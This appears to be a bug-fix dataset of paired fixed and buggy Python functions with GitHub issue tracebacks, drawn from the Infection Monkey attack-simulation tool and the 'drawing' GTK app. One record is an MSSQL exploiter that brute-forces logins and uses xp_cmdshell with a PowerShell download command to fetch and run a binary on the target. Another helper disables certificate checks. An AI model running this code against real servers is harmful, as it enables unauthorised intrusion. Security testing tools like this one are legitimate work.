2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
|
def get_monkey_group(monkey):
keywords = []
if len(set(monkey["ip_addresses"]).intersection(local_ip_addresses())) != 0:
keywords.extend(["island", "monkey"])
else:
monkey_type = (
"manual" if NodeService.get_monkey_manual_run(monkey) else "monkey"
)
keywords.append(monkey_type)
keywords.append(NodeService.get_monkey_os(monkey))
if not Monkey.get_single_monkey_by_id(monkey["_id"]).is_dead():
keywords.append("running")
return NodeStates.get_by_keywords(keywords).value
|
def get_monkey_group(monkey):
if len(set(monkey["ip_addresses"]).intersection(local_ip_addresses())) != 0:
monkey_type = "island_monkey"
else:
monkey_type = (
"manual" if NodeService.get_monkey_manual_run(monkey) else "monkey"
)
monkey_os = NodeService.get_monkey_os(monkey)
monkey_running = (
"" if Monkey.get_single_monkey_by_id(monkey["_id"]).is_dead() else "_running"
)
return "%s_%s%s" % (monkey_type, monkey_os, monkey_running)
|
https://github.com/guardicore/monkey/issues/528
|
2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
|
def get_node_group(node) -> str:
if "group" in node and node["group"]:
return node["group"]
node_type = "exploited" if node.get("exploited") else "clean"
node_os = NodeService.get_node_os(node)
return NodeStates.get_by_keywords([node_type, node_os]).value
|
def get_node_group(node):
node_type = "exploited" if node.get("exploited") else "clean"
node_os = NodeService.get_node_os(node)
return "%s_%s" % (node_type, node_os)
|
https://github.com/guardicore/monkey/issues/528
|
2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
|
def process_system_info_telemetry(telemetry_json):
telemetry_processing_stages = [
process_ssh_info,
process_credential_info,
process_mimikatz_and_wmi_info,
process_aws_data,
update_db_with_new_hostname,
test_antivirus_existence,
]
# Calling safe_process_telemetry so if one of the stages fail, we log and move on instead of failing the rest of
# them, as they are independent.
for stage in telemetry_processing_stages:
safe_process_telemetry(stage, telemetry_json)
|
def process_system_info_telemetry(telemetry_json):
process_ssh_info(telemetry_json)
process_credential_info(telemetry_json)
process_mimikatz_and_wmi_info(telemetry_json)
process_aws_data(telemetry_json)
update_db_with_new_hostname(telemetry_json)
test_antivirus_existence(telemetry_json)
|
https://github.com/guardicore/monkey/issues/460
|
2019-10-11 19:36:09,431 - processing.py:29 - process_telemetry() - ERROR - Exception caught while processing telemetry. Info: _id
Traceback (most recent call last):
File "C:\Users\shay.nehmad\PycharmProjects\monkey\monkey\monkey_island\cc\services\telemetry\processing\processing.py", line 25, in process_telemetry
TELEMETRY_CATEGORY_TO_PROCESSING_FUNC[telem_category](telemetry_json)
File "C:\Users\shay.nehmad\PycharmProjects\monkey\monkey\monkey_island\cc\services\telemetry\processing\system_info.py", line 16, in process_system_info_telemetry
update_db_with_new_hostname(telemetry_json)
File "C:\Users\shay.nehmad\PycharmProjects\monkey\monkey\monkey_island\cc\services\telemetry\processing\system_info.py", line 105, in update_db_with_new_hostname
Monkey.get_single_monkey_by_id(telemetry_json['_id']).set_hostname(telemetry_json['data']['hostname'])
KeyError: '_id'
|
KeyError
|
def update_db_with_new_hostname(telemetry_json):
Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]).set_hostname(
telemetry_json["data"]["hostname"]
)
|
def update_db_with_new_hostname(telemetry_json):
Monkey.get_single_monkey_by_id(telemetry_json["_id"]).set_hostname(
telemetry_json["data"]["hostname"]
)
|
https://github.com/guardicore/monkey/issues/460
|
2019-10-11 19:36:09,431 - processing.py:29 - process_telemetry() - ERROR - Exception caught while processing telemetry. Info: _id
Traceback (most recent call last):
File "C:\Users\shay.nehmad\PycharmProjects\monkey\monkey\monkey_island\cc\services\telemetry\processing\processing.py", line 25, in process_telemetry
TELEMETRY_CATEGORY_TO_PROCESSING_FUNC[telem_category](telemetry_json)
File "C:\Users\shay.nehmad\PycharmProjects\monkey\monkey\monkey_island\cc\services\telemetry\processing\system_info.py", line 16, in process_system_info_telemetry
update_db_with_new_hostname(telemetry_json)
File "C:\Users\shay.nehmad\PycharmProjects\monkey\monkey\monkey_island\cc\services\telemetry\processing\system_info.py", line 105, in update_db_with_new_hostname
Monkey.get_single_monkey_by_id(telemetry_json['_id']).set_hostname(telemetry_json['data']['hostname'])
KeyError: '_id'
|
KeyError
|
def exploit_host(self):
# Brute force to get connection
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
cursor = self.brute_force(
self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list
)
if not cursor:
LOG.error("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
return False
# Get monkey exe for host and it's path
src_path = tools.get_target_monkey(self.host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
# Create server for http download and wait for it's startup.
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
if not http_path:
LOG.debug("Exploiter failed, http transfer creation failed.")
return False
LOG.info("Started http server on %s", http_path)
dst_path = get_monkey_dest_path(http_path)
tmp_file_path = os.path.join(get_monkey_dir_path(), MSSQLExploiter.TMP_FILE_NAME)
# Create monkey dir.
commands = ['xp_cmdshell "mkdir %s"' % get_monkey_dir_path()]
MSSQLExploiter.execute_command(cursor, commands)
# Form download command in a file
commands = [
'xp_cmdshell "<nul set /p=powershell (new-object System.Net.WebClient).DownloadFile>%s"'
% tmp_file_path,
"xp_cmdshell \"<nul set /p=(^'%s^' >>%s\"" % (http_path, tmp_file_path),
"xp_cmdshell \"<nul set /p=, ^'%s^') >>%s\"" % (dst_path, tmp_file_path),
]
MSSQLExploiter.execute_command(cursor, commands)
MSSQLExploiter.run_file(cursor, tmp_file_path)
# Form monkey's command in a file
monkey_args = tools.build_monkey_commandline(
self.host, tools.get_monkey_depth() - 1, dst_path
)
monkey_args = [
'xp_cmdshell "<nul set /p=%s >>%s"' % (part, tmp_file_path)
for part in textwrap.wrap(monkey_args, 40)
]
commands = [
'xp_cmdshell "<nul set /p=%s %s >%s"' % (dst_path, DROPPER_ARG, tmp_file_path)
]
commands.extend(monkey_args)
MSSQLExploiter.execute_command(cursor, commands)
MSSQLExploiter.run_file(cursor, tmp_file_path)
return True
|
def exploit_host(self):
# Brute force to get connection
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
cursor = self.brute_force(
self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list
)
if not cursor:
LOG.error("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
return False
# Get monkey exe for host and it's path
src_path = tools.get_target_monkey(self.host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
# Create server for http download and wait for it's startup.
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
if not http_path:
LOG.debug("Exploiter failed, http transfer creation failed.")
return False
LOG.info("Started http server on %s", http_path)
dst_path = get_monkey_dest_path(http_path)
tmp_file_path = os.path.join(
WormConfiguration.monkey_dir_windows, MSSQLExploiter.TMP_FILE_NAME
)
# Create monkey dir.
commands = ['xp_cmdshell "mkdir %s"' % WormConfiguration.monkey_dir_windows]
MSSQLExploiter.execute_command(cursor, commands)
# Form download command in a file
commands = [
'xp_cmdshell "<nul set /p=powershell (new-object System.Net.WebClient).DownloadFile>%s"'
% tmp_file_path,
"xp_cmdshell \"<nul set /p=(^'%s^' >>%s\"" % (http_path, tmp_file_path),
"xp_cmdshell \"<nul set /p=, ^'%s^') >>%s\"" % (dst_path, tmp_file_path),
]
MSSQLExploiter.execute_command(cursor, commands)
MSSQLExploiter.run_file(cursor, tmp_file_path)
# Form monkey's command in a file
monkey_args = tools.build_monkey_commandline(
self.host, tools.get_monkey_depth() - 1, dst_path
)
monkey_args = [
'xp_cmdshell "<nul set /p=%s >>%s"' % (part, tmp_file_path)
for part in textwrap.wrap(monkey_args, 40)
]
commands = [
'xp_cmdshell "<nul set /p=%s %s >%s"' % (dst_path, DROPPER_ARG, tmp_file_path)
]
commands.extend(monkey_args)
MSSQLExploiter.execute_command(cursor, commands)
MSSQLExploiter.run_file(cursor, tmp_file_path)
return True
|
https://github.com/guardicore/monkey/issues/348
|
2019-06-12 10:19:04,545 [24008:17700:ERROR] main.main.130: Exception thrown from monkey's start function
Traceback (most recent call last):
File "monkey\infection_monkey\main.py", line 121, in main
File "monkey\infection_monkey\monkey.py", line 83, in start
File "monkey\infection_monkey\utils.py", line 46, in create_monkey_dir
WindowsError: [Error 5] Access is denied: 'C:\\Windows\\Temp\\monkey_dir'
|
WindowsError
|
def is_64bit_windows_os():
"""
Checks for 64 bit Windows OS using environment variables.
"""
return "PROGRAMFILES(X86)" in os.environ
|
def is_64bit_windows_os():
"""
Checks for 64 bit Windows OS using environment variables.
:return:
"""
return "PROGRAMFILES(X86)" in os.environ
|
https://github.com/guardicore/monkey/issues/348
|
2019-06-12 10:19:04,545 [24008:17700:ERROR] main.main.130: Exception thrown from monkey's start function
Traceback (most recent call last):
File "monkey\infection_monkey\main.py", line 121, in main
File "monkey\infection_monkey\monkey.py", line 83, in start
File "monkey\infection_monkey\utils.py", line 46, in create_monkey_dir
WindowsError: [Error 5] Access is denied: 'C:\\Windows\\Temp\\monkey_dir'
|
WindowsError
|
def get_monkey_dir_path():
return os.path.join(tempfile.gettempdir(), WormConfiguration.monkey_dir_name)
|
def get_monkey_dir_path():
if is_windows_os():
return WormConfiguration.monkey_dir_windows
else:
return WormConfiguration.monkey_dir_linux
|
https://github.com/guardicore/monkey/issues/348
|
2019-06-12 10:19:04,545 [24008:17700:ERROR] main.main.130: Exception thrown from monkey's start function
Traceback (most recent call last):
File "monkey\infection_monkey\main.py", line 121, in main
File "monkey\infection_monkey\monkey.py", line 83, in start
File "monkey\infection_monkey\utils.py", line 46, in create_monkey_dir
WindowsError: [Error 5] Access is denied: 'C:\\Windows\\Temp\\monkey_dir'
|
WindowsError
|
def get_redirected(url):
# Returns false if url is not right
headers = {"User-Agent": "Mozilla/5.0"}
request = urllib2.Request(url, headers=headers)
try:
return urllib2.urlopen(
request, context=ssl._create_unverified_context()
).geturl()
except urllib2.URLError:
LOG.error("Can't reach struts2 server")
return False
|
def get_redirected(url):
# Returns false if url is not right
headers = {"User-Agent": "Mozilla/5.0"}
request = urllib2.Request(url, headers=headers)
try:
return urllib2.urlopen(request).geturl()
except urllib2.URLError:
LOG.error("Can't reach struts2 server")
return False
|
https://github.com/guardicore/monkey/issues/306
|
2019-04-17 15:52:15,293 [23152:22664:ERROR] monkey.start.190: Exception while attacking Victim Host 216.58.207.78: OS - [type-linux ] Services - [tcp-443-{'data': ('gws', True), 'name': 'http'} tcp-80-{'data': ('gws', False), 'name': 'http'} ] target monkey: None using Struts2Exploiter: hostname '216.58.207.78' doesn't match either of '*.google.com', '*.android.com', '*.appengine.google.com', '*.cloud.google.com', '*.crowdsource.google.com', '*.g.co', '*.gcp.gvt2.com', '*.ggpht.cn', '*.google-analytics.com', '*.google.ca', '*.google.cl', '*.google.co.in', '*.google.co.jp', '*.google.co.uk', '*.google.com.ar', '*.google.com.au', '*.google.com.br', '*.google.com.co', '*.google.com.mx', '*.google.com.tr', '*.google.com.vn', '*.google.de', '*.google.es', '*.google.fr', '*.google.hu', '*.google.it', '*.google.nl', '*.google.pl', '*.google.pt', '*.googleadapis.com', '*.googleapis.cn', '*.googlecnapps.cn', '*.googlecommerce.com', '*.googlevideo.com', '*.gstatic.cn', '*.gstatic.com', '*.gstaticcnapps.cn', '*.gvt1.com', '*.gvt2.com', '*.metric.gstatic.com', '*.urchin.com', '*.url.google.com', '*.youtube-nocookie.com', '*.youtube.com', '*.youtubeeducation.com', '*.youtubekids.com', '*.yt.be', '*.ytimg.com', 'android.clients.google.com', 'android.com', 'developer.android.google.cn', 'developers.android.google.cn', 'g.co', 'ggpht.cn', 'goo.gl', 'google-analytics.com', 'google.com', 'googlecnapps.cn', 'googlecommerce.com', 'source.android.google.cn', 'urchin.com', 'www.goo.gl', 'youtu.be', 'youtube.com', 'youtubeeducation.com', 'youtubekids.com', 'yt.be'
Traceback (most recent call last):
File "C:\monkey\monkey\infection_monkey\monkey.py", line 181, in start
result = exploiter.exploit_host()
File "C:\monkey\monkey\infection_monkey\exploit\web_rce.py", line 79, in exploit_host
urls = self.build_potential_urls(ports, exploit_config['url_extensions'])
File "C:\monkey\monkey\infection_monkey\exploit\struts2.py", line 41, in build_potential_urls
url_list = [self.get_redirected(url) for url in url_list]
File "C:\monkey\monkey\infection_monkey\exploit\struts2.py", line 50, in get_redirected
return urllib2.urlopen(request).geturl()
File "C:\Python27\lib\urllib2.py", line 154, in urlopen
return opener.open(url, data, timeout)
File "C:\Python27\lib\urllib2.py", line 429, in open
response = self._open(req, data)
File "C:\Python27\lib\urllib2.py", line 447, in _open
'_open', req)
File "C:\Python27\lib\urllib2.py", line 407, in _call_chain
result = func(*args)
File "C:\Python27\lib\urllib2.py", line 1241, in https_open
context=self._context)
File "C:\Python27\lib\urllib2.py", line 1195, in do_open
h.request(req.get_method(), req.get_selector(), req.data, headers)
File "C:\Python27\lib\httplib.py", line 1042, in request
self._send_request(method, url, body, headers)
File "C:\Python27\lib\httplib.py", line 1082, in _send_request
self.endheaders(body)
File "C:\Python27\lib\httplib.py", line 1038, in endheaders
self._send_output(message_body)
File "C:\Python27\lib\httplib.py", line 882, in _send_output
self.send(msg)
File "C:\Python27\lib\httplib.py", line 844, in send
self.connect()
File "C:\Python27\lib\httplib.py", line 1263, in connect
server_hostname=server_hostname)
File "C:\Python27\lib\ssl.py", line 369, in wrap_socket
_context=self)
File "C:\Python27\lib\ssl.py", line 617, in __init__
self.do_handshake()
File "C:\Python27\lib\ssl.py", line 854, in do_handshake
match_hostname(self.getpeercert(), self.server_hostname)
File "C:\Python27\lib\ssl.py", line 288, in match_hostname
% (hostname, ', '.join(map(repr, dnsnames))))
CertificateError: hostname '216.58.207.78' doesn't match either of '*.google.com', '*.android.com', '*.appengine.google.com', '*.cloud.google.com', '*.crowdsource.google.com', '*.g.co', '*.gcp.gvt2.com', '*.ggpht.cn', '*.google-analytics.com', '*.google.ca', '*.google.cl', '*.google.co.in', '*.google.co.jp', '*.google.co.uk', '*.google.com.ar', '*.google.com.au', '*.google.com.br', '*.google.com.co', '*.google.com.mx', '*.google.com.tr', '*.google.com.vn', '*.google.de', '*.google.es', '*.google.fr', '*.google.hu', '*.google.it', '*.google.nl', '*.google.pl', '*.google.pt', '*.googleadapis.com', '*.googleapis.cn', '*.googlecnapps.cn', '*.googlecommerce.com', '*.googlevideo.com', '*.gstatic.cn', '*.gstatic.com', '*.gstaticcnapps.cn', '*.gvt1.com', '*.gvt2.com', '*.metric.gstatic.com', '*.urchin.com', '*.url.google.com', '*.youtube-nocookie.com', '*.youtube.com', '*.youtubeeducation.com', '*.youtubekids.com', '*.yt.be', '*.ytimg.com', 'android.clients.google.com', 'android.com', 'developer.android.google.cn', 'developers.android.google.cn', 'g.co', 'ggpht.cn', 'goo.gl', 'google-analytics.com', 'google.com', 'googlecnapps.cn', 'googlecommerce.com', 'source.android.google.cn', 'urchin.com', 'www.goo.gl', 'youtu.be', 'youtube.com', 'youtubeeducation.com', 'youtubekids.com', 'yt.be'
|
CertificateError
|
def _show_text_with_options(self, cc, pl, text, text_x, text_y):
cc.move_to(text_x, text_y)
pl.set_text(text, -1)
PangoCairo.update_layout(cc, pl)
PangoCairo.show_layout(cc, pl)
|
def _show_text_with_options(self, cc, pl, text, text_x, text_y):
cc.move_to(text_x, text_y)
pl.set_text(text)
PangoCairo.update_layout(cc, pl)
PangoCairo.show_layout(cc, pl)
|
https://github.com/maoschanz/drawing/issues/275
|
Traceback (most recent call last):
File "/usr/share/drawing/drawing/tool_text.py", line 184, in _preview_text
self.do_tool_operation(operation)
File "/usr/share/drawing/drawing/tool_text.py", line 251, in do_tool_operation
entire_text, text_x + dx, text_y + dy)
File "/usr/share/drawing/drawing/tool_text.py", line 264, in _show_text_with_options
pl.set_text(text)
TypeError: Pango.Layout.set_text() takes exactly 3 arguments (2 given)
|
TypeError
|
def _set_active_type(self, *args):
state_as_string = self.get_option_value("filters_type")
self._reset_type_values()
if state_as_string == "blur_fast":
self.blur_algo = BlurType.CAIRO_REPAINTS
self.type_label = _("Fast blur")
elif state_as_string == "blur_slow":
self.blur_algo = BlurType.PX_BOX
self.type_label = _("Slow blur")
elif state_as_string == "tiles":
self.blur_algo = BlurType.TILES
self.type_label = _("Pixelization")
elif state_as_string == "saturation":
self.saturate = True
self.type_label = _("Change saturation")
elif state_as_string == "veil":
self.pixelate = True
self.type_label = _("Veil")
elif state_as_string == "invert":
self.invert = True
self.type_label = _("Invert colors")
elif state_as_string == "transparency":
self.transparency = True
self.type_label = _("Add transparency")
else:
self.type_label = _("Select a filter…")
self.bar.on_filter_changed()
|
def _set_active_type(self, *args):
state_as_string = self.get_option_value("filters_type")
self._reset_type_values()
if state_as_string == "blur_fast":
self.blur_algo = BlurType.CAIRO_REPAINTS
self.type_label = _("Fast blur")
elif state_as_string == "blur_slow":
self.blur_algo = BlurType.PX_BOX
self.type_label = _("Slow blur")
elif state_as_string == "tiles":
self.blur_algo = BlurType.TILES
self.type_label = _("Pixelation")
elif state_as_string == "saturation":
self.saturate = True
self.type_label = _("Change saturation")
elif state_as_string == "veil":
self.pixelate = True
self.type_label = _("Veil")
elif state_as_string == "invert":
self.invert = True
self.type_label = _("Invert colors")
elif state_as_string == "transparency":
self.transparency = True
self.type_label = _("Add transparency")
else:
self.type_label = _("Select a filter…")
self.bar.on_filter_changed()
|
https://github.com/maoschanz/drawing/issues/275
|
Traceback (most recent call last):
File "/usr/share/drawing/drawing/tool_text.py", line 184, in _preview_text
self.do_tool_operation(operation)
File "/usr/share/drawing/drawing/tool_text.py", line 251, in do_tool_operation
entire_text, text_x + dx, text_y + dy)
File "/usr/share/drawing/drawing/tool_text.py", line 264, in _show_text_with_options
pl.set_text(text)
TypeError: Pango.Layout.set_text() takes exactly 3 arguments (2 given)
|
TypeError
|
def __init__(self, window, **kwargs):
super().__init__("select", _("Selection"), "tool-select-symbolic", window)
self.use_color = False
self.accept_selection = True
self.selected_type_id = "rectangle"
self.selected_type_label = _("Rectangle selection")
self.closing_x = 0
self.closing_y = 0
self.x_press = 0
self.y_press = 0
self.future_x = 0
self.future_y = 0
self.future_path = None
self.future_pixbuf = None
self.operation_type = None # 'op-define'
self.behavior = "rectangle"
self.add_tool_action_enum("selection_type", self.selected_type_id)
# Special bottom panel TODO common to the 3 types
builder = Gtk.Builder.new_from_resource(
"/com/github/maoschanz/drawing/tools/ui/tool_select.ui"
)
self.bottom_panel = builder.get_object("bottom-panel")
actions_menu = builder.get_object("actions-menu")
builder.get_object("actions_btn").set_menu_model(actions_menu)
self.import_box_narrow = builder.get_object("import_box_narrow")
self.import_box_long = builder.get_object("import_box_long")
self.minimap_label = builder.get_object("minimap_label")
self.minimap_arrow = builder.get_object("minimap_arrow")
self.minimap_icon = builder.get_object("minimap_icon")
self.window.bottom_panel_box.add(self.bottom_panel)
self.implements_panel = True
# self.needed_width_for_long = XXX TODO currently harcoded
self.needed_width_for_long = 450
|
def __init__(self, window, **kwargs):
super().__init__("select", _("Selection"), "tool-select-symbolic", window)
self.use_color = False
self.accept_selection = True
self.selected_type_id = "rectangle"
self.selected_type_label = _("Rectangle selection")
self.closing_x = 0
self.closing_y = 0
self.x_press = 0
self.y_press = 0
self.future_x = 0
self.future_y = 0
self.future_path = None
self.future_pixbuf = None
self.operation_type = None # 'op-define'
self.behavior = "rectangle"
self.add_tool_action_enum("selection_type", self.selected_type_id)
# Special bottom panel TODO common to the 3 types
builder = Gtk.Builder.new_from_resource(
"/com/github/maoschanz/drawing/tools/ui/tool_select.ui"
)
self.bottom_panel = builder.get_object("bottom-panel")
actions_menu = builder.get_object("actions-menu")
builder.get_object("actions_btn").set_menu_model(actions_menu)
self.import_box_narrow = builder.get_object("import_box_narrow")
self.import_box_long = builder.get_object("import_box_long")
self.minimap_label = builder.get_object("minimap_label")
self.minimap_arrow = builder.get_object("minimap_arrow")
self.minimap_icon = builder.get_object("minimap_icon")
self.window.bottom_panel_box.add(self.bottom_panel)
self.implements_panel = True
# self.needed_width_for_long = XXX TODO currently harcoded
self.needed_width_for_long = 400
|
https://github.com/maoschanz/drawing/issues/70
|
Traceback (most recent call last):
File "/usr/bin/drawing", line 42, in <module>
from drawing import main
File "/usr/share/drawing/drawing/main.py", line 23, in <module>
from .window import DrawingWindow
File "/usr/share/drawing/drawing/window.py", line 40, in <module>
from .image import DrawingImage
File "/usr/share/drawing/drawing/image.py", line 31, in <module>
@Gtk.Template(resource_path='/com/github/maoschanz/drawing/ui/image.ui')
File "/usr/lib/python3/dist-packages/gi/overrides/__init__.py", line 39, in __getattr__
return getattr(self._introspection_module, name)
File "/usr/lib/python3/dist-packages/gi/module.py", line 137, in __getattr__
self.__name__, name))
AttributeError: 'gi.repository.Gtk' object has no attribute 'Template'
|
AttributeError
|
def set_tools_labels_visibility(self, visible):
"""Change the way tools are displayed in the side panel. Visible labels
mean the tools will be arranged in a scrollable list of buttons, else
they will be in an adaptative flowbox."""
for tool_id in self.tools:
self.tools[tool_id].label_widget.set_visible(visible)
nb_tools = len(self.tools)
if visible:
self.tools_panel.set_min_children_per_line(nb_tools)
self.tools_nonscrollable_box.remove(self.tools_panel)
self.tools_scrollable_box.add(self.tools_panel)
else:
self.tools_scrollable_box.remove(self.tools_panel)
self.tools_nonscrollable_box.add(self.tools_panel)
nb_min = int((nb_tools + (nb_tools % 3)) / 3) - 1
self.tools_panel.set_min_children_per_line(nb_min)
self.tools_panel.set_max_children_per_line(nb_tools)
|
def set_tools_labels_visibility(self, visible):
"""Change the way tools are displayed in the side panel. Visible labels
mean the tools will be arranged in a scrollable list of buttons, else
they will be in an adaptative flowbox."""
for tool_id in self.tools:
self.tools[tool_id].label_widget.set_visible(visible)
nb_tools = len(self.tools)
if visible:
if self.tools_panel.get_parent() is self.tools_nonscrollable_box:
self.tools_nonscrollable_box.remove(self.tools_panel)
self.tools_scrollable_box.add(self.tools_panel)
self.tools_panel.set_min_children_per_line(nb_tools)
else:
if self.tools_panel.get_parent() is self.tools_scrollable_box:
self.tools_scrollable_box.remove(self.tools_panel)
self.tools_nonscrollable_box.add(self.tools_panel)
# FIXME largeur des boutons pétée
nb_tools = len(self.tools)
self.tools_panel.set_min_children_per_line((nb_tools + (nb_tools % 3)) / 3)
self.tools_panel.set_max_children_per_line(nb_tools)
|
https://github.com/maoschanz/drawing/issues/70
|
Traceback (most recent call last):
File "/usr/bin/drawing", line 42, in <module>
from drawing import main
File "/usr/share/drawing/drawing/main.py", line 23, in <module>
from .window import DrawingWindow
File "/usr/share/drawing/drawing/window.py", line 40, in <module>
from .image import DrawingImage
File "/usr/share/drawing/drawing/image.py", line 31, in <module>
@Gtk.Template(resource_path='/com/github/maoschanz/drawing/ui/image.ui')
File "/usr/lib/python3/dist-packages/gi/overrides/__init__.py", line 39, in __getattr__
return getattr(self._introspection_module, name)
